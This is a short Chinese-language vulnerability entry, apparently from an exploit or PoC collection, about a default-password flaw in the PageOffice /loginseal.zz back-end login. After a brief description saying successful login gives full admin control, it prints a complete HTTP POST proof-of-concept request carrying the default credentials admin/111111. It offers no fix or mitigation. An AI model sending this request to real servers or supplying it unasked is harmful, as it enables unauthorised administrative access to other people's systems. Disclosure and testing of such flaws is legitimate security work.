漏洞描述
PAGEOFFICE是由卓正软件自主开发的互联网私有云OFFICE技术解决方案。北京卓正志远软件有限公司PageOffice的 /loginseal.zz 存在弱口令漏洞,攻击者可以利用这一弱点,直接访问该URL,并使用这些广为人知的默认凭证尝试登录。一旦登录成功,攻击者将获得该后台的完整管理权限。
PageOffice /loginseal.zz 默认口令漏洞
PoC代码
POST /loginseal.zz HTTP/1.1
Host:
Accept-Encoding: gzip
Connection: keep-alive
Content-Length: 38
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
TextUserName=admin&TextPassword=111111